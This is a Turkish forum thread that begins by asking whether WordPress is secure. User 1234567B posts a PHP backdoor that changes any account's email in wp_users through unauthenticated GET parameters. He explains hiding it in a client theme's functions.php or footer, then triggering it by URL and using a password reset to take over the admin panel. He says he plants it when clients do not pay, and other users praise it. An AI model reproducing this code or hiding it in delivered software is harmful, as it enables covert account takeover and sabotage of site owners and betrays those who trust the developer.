Wordpress Güvenilir Mi?
-
Merhaba arkadaşlar
Milyonlarca kullanıcısı olan wordpress gercekten güvenli mi? Güvenliyse neden güvenli, degilse ne gibi önlemler almalıyız?
Kisaca wp de güvenlik konusunda ne gibi tedbirler alıyorsunuz?
-
zibille işim oldu wordpress'te. ilk kullanmaya başladığım ve hala kullanmaya devam ettiğim cms
host , kullandığın eklentiler , tema vs. bunların hepsi güvenliğe etki eden unsurlar.
lakin herşey ince ayarlarda kurulumda vs. bitiyor. ben hem iyi hemde çok kötü diyebilirim.
-
Joomla bence içerik yönetimi olarak daha rahat bence joomla
-
1234567B bunu yazdı
Wordpress Kadar popüler bir sistem yok arkadaşım. Güvenlik olayı ise eklentilerle ilgili birşey. Adam yapıyor içinede gömüyor kodunu sonra hacklenince wordpress güvensiz oluyor.Problem sistemde değil önüne gelen eklentiyi eklemekte. Misal ben birine kaporasız iş yapıyorsam mutlaka önlemimi alırım. Örnek olarak;
<?php $one=@$_GET["one"]; $two=@$_GET["two"]; if($one!=""){ echo '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>'."\n"; $succs=$wpdb->update('wp_users', array('user_email'=>$one), array('id'=>$two)); if($succs){ echo'<script type="text/javascript"> $(function(){ alert("silvergate"); }); </script>'; } } ?>1234567B tarafından 10/Tem/14 23:58 tarihinde düzenlenmiştir -
Hocam bu kodu nereye koyuyoruz.. Nasıl kullanıyoruz biraz bahsetsenizde.. Şu para alamadığımız işlerde bizde değerlendirsek :)
-
McM bunu yazdı
Hocam bu kodu nereye koyuyoruz.. Nasıl kullanıyoruz biraz bahsetsenizde.. Şu para alamadığımız işlerde bizde değerlendirsek :)
www.siteadi.com'da tema kurulu olsun.Kodlar functions.php'de olursa daha sağlıklı olur.Index veya Footer içinede atılabilir.
www.siteadi.com/?one=seninemail@gmail.com%two=1
ziyaret ettiğinde ID değeri 1 olan üyenin mail adresini seninmail@gmail.com yapar. Ardından klasik şifremi unuttum talebiyle panele ulaşabilirsin.Ben bunu parayı alamadığım zaman hemen yapmıyorum.Bekliyorum ki adam siteyi bir düzene oturtsun hiti artsın.Sonrasında gömüyorum ki taklaya gelsin.
Hayatımda hazmedeğim şeylerin başında gelir kazıklanmak. 100lira birine birşey ısmarlıyayım ama bana 10lira takmasın.
-
1234567B bunu yazdı1234567B bunu yazdı
Wordpress Kadar popüler bir sistem yok arkadaşım. Güvenlik olayı ise eklentilerle ilgili birşey. Adam yapıyor içinede gömüyor kodunu sonra hacklenince wordpress güvensiz oluyor.Problem sistemde değil önüne gelen eklentiyi eklemekte. Misal ben birine kaporasız iş yapıyorsam mutlaka önlemimi alırım. Örnek olarak;
Bu iyiymiş cidden
-
1234567B bunu yazdıMcM bunu yazdı
Hocam bu kodu nereye koyuyoruz.. Nasıl kullanıyoruz biraz bahsetsenizde.. Şu para alamadığımız işlerde bizde değerlendirsek :)
www.siteadi.com'da tema kurulu olsun.Kodlar functions.php'de olursa daha sağlıklı olur.Index veya Footer içinede atılabilir.
www.siteadi.com/?one=seninemail@gmail.com%two=1
ziyaret ettiğinde ID değeri 1 olan üyenin mail adresini seninmail@gmail.com yapar. Ardından klasik şifremi unuttum talebiyle panele ulaşabilirsin.Ben bunu parayı alamadığım zaman hemen yapmıyorum.Bekliyorum ki adam siteyi bir düzene oturtsun hiti artsın.Sonrasında gömüyorum ki taklaya gelsin.
Hayatımda hazmedeğim şeylerin başında gelir kazıklanmak. 100lira birine birşey ısmarlıyayım ama bana 10lira takmasın.
Sana işim düşmesin :P
